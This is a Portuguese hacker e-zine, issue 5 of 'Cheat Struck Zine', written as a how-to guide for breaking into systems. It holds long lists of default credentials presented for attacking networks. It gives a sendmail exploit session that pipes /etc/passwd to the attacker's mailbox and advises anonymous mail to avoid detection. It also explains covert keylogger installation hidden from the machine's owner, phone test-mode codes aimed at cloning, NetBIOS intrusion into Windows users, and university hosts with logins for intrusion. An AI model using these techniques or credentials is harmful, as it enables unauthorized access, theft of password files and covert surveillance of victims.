CSZ - Cheat Struck Zine
edição 5
por: Cheat Struck
*****************************************************************************
Indice:
1. Introdução
2. Dicas Hacks
3. Bugs
4. VIRII
5. Programas Hackers
6. Hacking para iniciantes
7. Phreaking
8. Invasão de privacidade
9. Hack, the Art
10. Preview
*****************************************************************************
1. Introdução
Estamos ai de novo. Já estamos na edição 5, quer dizer, eu estou né,
pq eu é que escrevo todo o zine sózinho e por isso é que ele não é tão longo
quanto os outros que circulam pela inet.
Mas eu acho que apartir daqui as edições irão ficar mais "gordas".
Para se ter uma ideia, a seção Dicas Hacks, que nas outras edições não passa-
vam de 20 linhas, nessa edição só ela tem... a sei lá não vou contar, mas que
ela ta "cheia" tá, deve ter mais de 200 linhas só de passwords defaults dos
mais variados sistemas encontrados na inet.
Tenho que confesar que tirei coisas de outros zines. Mas os zines que
eu ando "copiando" coisas são zines americanos e espanois que você raramente
irá encontrar por ai. E mesmo assim a maioria das seções, estão coisas que eu
mesmo fiz e esperimentei.
Aki vc também irá achar a segunda parte do tutorial de ASSEMBLER, eu
tenho que comentar q não fiz nenhum curso especializado nessa linguagem,
apenas fui vendo as fontes de alguns programas e virus e fui testando, por
isso não garanto que a informação contida esteja 100% certa mas até agora,
não tive problemas com meus progs.
Outra coisa... É precisso ter muita paciencia para fazer um zine
desses sabiam. A um pouco eu estava fazendo um texto para a nova seção "Hack-
ing para iniciantes", estava escrevendo o txt com o edit do DOS quando...PUM!
Abriu mais uma daquelas janelas escrotas do windows, sabe akelas telas azuis
que indicam um erro(OOB). É... por isso eu aconselho aos BEGINERS que querem
ser hackers que instalem logo um UNIX para mim não ter que continuar a digi-
tar esses txts com produtos da microsoft. A não comprem o WIN 98, a primeira
vista ele pode parecer bom e interesante, mas aos poucos vão aparecendo os
bugs.
*****************************************************************************
2. Dicas Hacks
Aki vai uma lista de contas padrões de Sistemas Operacionais.
Elas podem ser muito uteis nos atakes a redes que usam esses SOs com
suas próprias contas padrões...
As contas estão no formato login, senha.
### AIX ###
guest guest
### AS/400 ###
qsecofr qsecofr
qsysopr qsysopr
qpgmr qpgmr
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qsvr qsvr
secofr secofr
### DECserver ###
ACCESS
SYSTEM
### HP MPE-XL ###
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT
HELLO FIELD.HPUNSUP
HELLO FIELD.SUPPORT
HELLO FIELD.HP
HELLO OP.OPERATOR
MGR CAROLIAN
MGR CCC
MGR CNAS
MGR CONV
MGR COGNOS
OPERATOR COGNOS
MANAGER COGNOS
OPERATOR DISC
MGR HPDESK
MGR HPWORD
FIELD HPWORD
MGR HPOFFICE
SPOOLMAN HPOFFICE
ADVMAIL HPOFFICE
MAIL HPOFFICE
WP HPOFFICE
MANAGER HPOFFICE
MGR HPONLY
FIELD HPP187
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MANAGER ITF3000
MAIL MAIL
MGR NETBASE
MGR REGO
MGR RJE
MGR ROBELLE
MANAGER SECURITY
MGR SECURITY
FIELD SERVICE
MANAGER SYS
MGR SYS
PCUSER SYS
RSBCMON SYS
OPERATOR SYS
OPERATOR SYSTEM
FIELD SUPPORT
OPERATOR SUPPORT
MANAGER TCH
MAIL TELESUP
MANAGER TELESUP
MGR TELESUP
SYS TELESUP
MGE VESOFT
MGE VESOFT
MGR WORD
MGR XLSERVER
### Major BBS ###
Sysop Sysop
### PICK O/S ###
DSA
DS
DESQUETOP
PHANTOM
### Prolog ###
PBX PBX
NETWORK NETWORK
NETOP <não tem>
### Rolm ###
op op
op operator
su super
admin pwp
eng engineer
### PhoneMail Defaults ###
sysadmin sysadmin
tech tech
poll tech
### RSX ###
SYSTEM SYSTEM (Username SYSTEM, Password SYSTEM)
1,1 system (Directory [1,1] Password SYSTEM)
BATCH BATCH (Username SYSTEM, Password SYSTEM)
SYSTEM MANAGER
USER USER
MICRO RSX
### System 75 ###
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field
### Taco Bell ###
rgm rollout
tacobell <não tem>
### Verifone Junior 2.05 ###
166816
### VMS ###
field service
systest utep
### UNIX ###
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo
### PRIME ###
PRIME PRIME
PRIME PRIMOS
PRIMOS PRIMOS
PRIMOS PRIME
PRIMOS_CS PRIME
PRIMOS_CS PRIMOS
PRIMENET PRIMENET
SYSTEM SYSTEM
SYSTEM PRIME
SYSTEM PRIMOS
NETLINK NETLINK
TEST TEST
GUEST GUEST
GUEST1 GUEST
### DEC10 ###
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES
###IRIS ###
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING
*****************************************************************************
3. Bugs
Agora é pra valer... Ao contrario das primeiras edições, onde eu mos-
trava bugs infames de Windows 95, NT e DOS, agora nessa seção irá sair apenas
bugs que poderão ser muito uteis para invasão a servidores.
O este bugfaz é permitir que enviando um comando na linha do sendmail
possa conseguir que o fichero de passwords seja enviado para a sua mailbox.
(Por isso é conveniente usar um mail anonimo para não ser achado)
Sistemas: Unix's em geral, espacialmente AIX e SUNOS
Versões: Sendmail, versões anteriores a 5.57
Descrição: Bug de sendmail
Exemplo: em unix ou linux
saqland % telnet vitima.com 25
Trying 128.128.128.1...
Connected to vitima.com
Escape character is '^]'.
220 vitima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail tua_direção@de_mail.com < /etc/passwd"
250 "|/bin/mail tua_direção@de_mail.com < /etc/passwd"... Sender ok
rcpt to: qualquerum
550 qualquerum... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
saqland %
Exemplo: Conexão via DOS ou Windows
Com um programa de telnet conecte-se a este url -> victima.com:25 ou
se puder configurar nos menus, configure-o para que a conexão seja feita pela
porta 25, que é a do sendmail.
220 vitima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail tua_direção@de_mail.com < /etc/passwd"
250 "|/bin/mail tua_direção@de_mail.com < /etc/passwd"... Sender ok
rcpt to: qualquerum
550 qualquerum... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Notas:
-vitima.com = url do sistema a ser hackeado.
-saqland = seu url.
-o que aparece com um numero antes são mensagens de sua vitima, o resto é o
que vc tem que escrever.
-Aprenda a usar bem o programa de telnet, porque é o que vc mais vai usar na
hora de hackear.
*****************************************************************************
4. VIRII
Aki vai a segunda parte do tutorial de assembler escrita por mim.
*****Tutorial de ASSEMBLER parte2*****
##### Colocando labels #####
Coloque o nome do label seguido por :(dois pontos). Exemplo:
inicio:
meio:
fim:
##### Comando JMP #####
Pula para um outro label. Exemplo:
parte1:
add AX,0001
parte2:
jmp parte1
##### Comando DEC #####
Diminui 0001 de um conjunto.
Exemplo:
MOV AX, 0004 ; AX = 0004
DEC AX ; 0004(AX) - 0001 = 0003
DEC AX ; 0003(AX) - 0001 = 0002
DEC AX ; 0002(AX) - 0001 = 0001
##### Comando INC #####
Adiciona 0001 em um conjunto.
Exemplo:
MOV AX, 0001 ; AX = 0001
INC AX ; 0001(AX) + 0001 = 0002
INC AX ; 0002(AX) + 0001 = 0003
INC AX ; 0003(AX) + 0001 = 0004
##### Conjunto IP #####
IP não é o protocolo usado pelo assembler, não. IP é a linha na qual o
assembler está lendo. Ex:
1565:0100 ADD AX, 0001
^^^^--IP
1565:0103 JMP 0100
^^^^--IP--^^^^
*****************************************************************************
5. Programas Hackers
*Nome do produto: KeyCopy Version 1.01
*Nome interno: KeyCopy
*Nome do Arquivo: KEYCOPY.COM
*Nome do Autor: Christopher E BoVee
*Marcas Registradas: <
*Idioma: Inglês(E.U.A)
*Versão do produto: 1.01
*CopyRight: (c) Copyright Christopher E BoVee 1990
*Comentarios: Use o KEYCOPY para pegar qualquer coisa ou qualquer ativasão
do teclado no seu computador.
Isso inclue quando estiver usando o Wordperfect 5.0, Multimate,Norton
Editor. Keycopy copia todo keystroke para um buffer na area de programa do
KEYCOPY. Bem, o buffer suporta 200 keystrokes na memoria, keycopy copiará o
buffer para um file com a data e hora do acesso. O file padrão é c:\keycopy.
Você pode especificar o drive, subdiretorio e nome do file por haver o file
parametro chamado KC.PRM no subdiretorio onde o KEYCOPY foi executado. O
computador poderá resetar, e executar o Keycopy denovo. Keycopy poderá ser
testado e usado com DOS 3.3 ou 4.0 com mais de 3k de memoria.
Como usar o Keycopy: Copie-o para o HD e depois digite KEYCOPY no dir
em que ele foi copiado. Pronto, ele está instalado e tudo o que for digitado
no DOS ele copiará para o file "c:\keycopy". Para que o dono do computador
não disconfiar que o keycopy foi instalado, delete-o que ele continuará ins-
talado. Outra coisa: Se o file c:\keycopy começar a ficar muito grande, dele-
te-o tb que ele será criado novamente ao digitarem alguma coisa no DOS. Você
também pode usar o atributo invisivel para esse file, para que não descubram
que ele foi instalado.
*****************************************************************************
6. Hacking para iniciantes
Seção nova no zine... Aki estarão varias dicas para quem está come-
çando a hackear, como quais os lugares ideais para começarem a hackear e uma
lista de termos usados no underworld.
Eu estava digitando uma lista de termos usados em redes por hackers e
administradores de rede mas ai abriu um OOB bem na hora deu digitar o "ç".
Por isso nesta edição vou colocar apenas os tipos de sistemas que vc pode e ñ
pode hackear, quer dizer, vc pode fazer o que quizer mas as que eu recomendo
são as seguintes:
* SISTEMAS QUE VOCÊ NÃO DEVE HACKEAR:
-Sistemas de grandes empresas que não poupariam gastos para te encontrar.
-Sistemas governamentais que são muito poderosos.
-Sistemas de companias telefonicas. Que são mais poderosos que os do governo.
-Sistemas que tenham alguma relação contigo. Para não ser identificado.
-Sistemas de empresas de segurança informatica. Saben mais que vc.
-Sistemas da policia. Não convém hackea-los.
-Sistemas de serviços secretos. Nos EUA é um esporte nacional tentar hackear
o FBI e o pentagono, porém é bastante arriscado.
* SISTEMAS QUE VOCÊ DEVE HACKEAR:
-Sites Warez.
-Provedores de pornografia infantil.
-Servidores de grupos terroristas ou fanaticos.
-Sistemas de governos não democraticos.
-Sistemas de traficantes de informação.
Note que os sistemas que vc deve hackear não podem entrar em contato
com a policia ou qualquer outro departamento por também estarem cometendo um
crime.
Tá, agora eu vou parar por aki pois já to cheio desses bugs da micro-
soft e se abrir outro OOB agora eu vou me encher e vai ser dificil eu conti-
nuar com o zine em DOS/Windows.
*****************************************************************************
7. Phreaking
Programando Celulares... Nesta edição vamos aprender a progamar celu-
lares motorola, para que talvéz nos consigamos clonear celulares, já que numa
edição passada eu não consegui colocar nada na materia "cloneando celulares".
Nessa edição eu tinha um monte de coisas para colocar sobre programa-
ção de celulares mas aí ficou muito cheio então decidi colocar apenas a pro-
gramação em TEST MODE.
### TEST MODE ###
Tem Muita coisa para colocar nessa seção, por isso vamos ficar apenas
com a parte pratica dos modelos mais atuais.
* PHONES NEWER 95xx
Muitos phones novos não requerem rudimentos. Se o numero da versão do
seu software é 9526 (Eu acho) ou newer, digite isso:
FCN + 0 + 0 + * + * + 8 3 7 8 6 6 3 3 + STO
* Outros modelos
Retire a bateria, localize 3 conectadores de metal... Coloque um
pedaçinho de papel de aluminio no conector do meio. Recoloque a bateria e
ligue-o.
### Programando TEST MODE ###
Após feito isso irá aparecer umas coisas estranhas, então digite:
32# para apagar tudo;
38# para mostrar o conteudo do ESN;
55# para entrar na programação do test mode;
Digite 55# para entrar no TEST MODE. Ao entrar no TEST MODE aparecerá
na telinha todo o seu status(Canal, RSSI, TX, e outras coisas que você não
entende)...
Ao total são 99 comandos que podem ser usados no TEST MODE mas iremos
com calma, então como hoje a seção phreaking está muito grande, aí vai apenas
10 comandos como introdução:
00# sem função
01# Reseta o celular, esse comando tem o mesmo efeito que o 13#.
02# Mostra o status corrente do Telephone. O status pode ser encontrado da
seguinte forma:
AAA BBB
Onde: AAA = Numero do canal(decimal) e BBB = leitura RSSI do canal
CDEFGHI
Onde:
C = frequencia SAT(0=5970, 1=6000, 2=6030, 3=sem channel lock)
D = Carrier (0=off, 1=on)
E = Signalling tone (0=off, 1=on)
F = nível da Forsa (0 a 7)
G = Channel mode (0=voice channel, 1=control channel)
H = Receive audio mute (0=unmuted, 1=muted)
I = Transmit audio mute (0=unmuted, 1=muted)
Aperte * para ver a próxima configuração e # para sair.
03# Reseta Automaticamente o Timer.
04# Inicia o Telephone com as condições padrões Standard:
Carrier Off
Power Level 0
Receiver Audio Muted
Transmit Audio Muted
Signalling Tone Off
SAT Off
Resetting of Watch-Dog Timer Enabled
DTMF and Audio Tones Off
Audio Path Set to Speaker
05# TX Carrier On (Tecla Transmisora)
06# TX Carrier Off
07# RX Audio Off (Mute Receiver Audio)
08# RX Audio On (Unmute Receiver Audio)
09# TX Audio Off
10# TX Audio On
*****************************************************************************
8. Invasão de privacidade
É um meio de invasão muito conhecido no underworld. Qualquer um que
tenha um UNIX está protegido mas os usuários de Windows...
Assim, entre num programa de IRC e descubra o IP ou Host de alguém,
Abra o programa de telnet e conecte-se com o IP/Host, se for um sistema UNIX
você deverá digitar um login valido para aquele sistema, porém se for um WIN
é só entrar e fazer a festa!!!
Para obter uma lista de IPs que você tem acesso você deve configurar
o WINS e o LMHOSTS. Com isso tb é possivel você entrar em outros sistemas WIN
mesmo usando o Windows.
Para configurar o WINS entre no painel de controle/rede e veja as
propriedades do protocolo TCP/IP. Aí configure o servidor WINS primario e
secundario. Se você não conhece nenhum coloque os seguintes 204.118.34.6 e
204.118.34.11.
Já o LMHOSTS é mais fácil, crie um file no c:\Windows chamado LMHOSTS
Atenção! o file deve se chamar apenas LMHOSTS e não lmhosts.txt
Agora para ver a lista de sistems que vc tem acesso digite NBTSTAT -N
e aparecerá uma lista de IPs e HOSTs que vc tem acesso.
Você então pode usar o ícone Ambiente de Rede e mapear os sistemas ou
usar Telnet. O problema do telnet é que nem sempre os sistemas de usuarios
usam as mesmas portas para acesso a telnet, 23 é a porta padrão e é até capaz
que vc encontre alguns sistemas de users que a usem. Mas se não va testando
com outras portas.
Aki vai uma lista de portas mais usadas nos seguintes servisos:
FTP(21)
POP3(110)
WWW ou HTTP(80)
IRC(6666, 6667, 6668, 6669)
SOCKS(1080)
TELNET(23)
SMTP(25)
*****************************************************************************
9. Hack, the Art
Hackear Universidades é uma das coisas mais feitas por hackers que
tão se lichando pra vida. O melhor meio de se hackear universidades é via
telnet. Vc pode encontrar varios endereços de universidades e seus logins
root.
Eu já dei uma pesquisada e encontrei os seguintes endereços e contas
para duas das maiores universidades daqui do sul:
* PUCRS
url : aleph.pucrs.br
login : guest
* UFRGS
url : asterix.ufrgs.br
login : sabibib
Não lembro a fonte dessas contas mas estavam juntas com urls e logins
de outros servisos telnet que não funcionam mais.
*****************************************************************************
10. Preview
Na próxima edição...
* Phreaking 'Continuação dos comandos para o TEST MODE
* Hacking para iniciantes 'Grossário de termos usados por hackers
* VIRII 'Continuação do tutorial de ASSEMBLER
* Bugs 'A seção bugs vem com toda a forsa
Futuras publicações...
* Lista de provedores e endereços ftp do BRASIL.
* Lista de pesquisa Hack versão 2.00.00
*****************************************************************************
By Cheat Struck